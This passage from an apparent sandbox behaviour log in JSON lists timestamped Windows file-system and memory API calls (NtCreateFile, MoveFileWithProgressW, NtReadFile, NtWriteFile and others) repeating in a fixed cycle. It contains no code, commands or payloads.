"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,648", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,658", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,658", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,658", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,658", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,658", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,658", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,658", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,658", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,658", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,658", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,658", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,668", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,668", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,678", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,678", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,678", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,678", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,678", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,678", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,678", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,678", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,688", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,688", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,688", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,688", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,688", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,688", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,688", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,688", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,698", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,708", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,708", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,708", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,708", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,708", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,708", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,708", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,708", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,708", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,708", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,708", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,718", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,718", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,718", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,718", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,718", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,718", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,718", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,718", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,718", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,718", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,718", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,728", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,728", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,728", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,728", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,728", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,728", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,728", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,728", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,728", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,728", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,728", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,738", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,738", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,748", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,748", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,748", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,748", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,748", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,748", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,748", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,758", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,768", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,768", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,778", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,778", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,778", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,778", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,778", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,778", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,778", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,778", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,788", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,788", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,788", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,788", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,788", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,788", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,788", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,788", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,798", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,798", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,808", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,818", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,818", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,818", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,818", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,818", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,818", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,818", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,818", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,818", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,818", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,818", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,828", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,828", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,828", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,838", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,838", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,848", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,848", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,848", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,848", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,848", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,848", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,848", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,848", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,848", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,848", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,848", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,858", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,858", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,858", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,868", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,868", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,868", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,878", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,878", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,878", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,878", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,878", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,878", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,878", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,878", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,878", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,888", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,888", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,888", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,898", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,898", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,908", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,908", "api": "NtWriteFile"}, 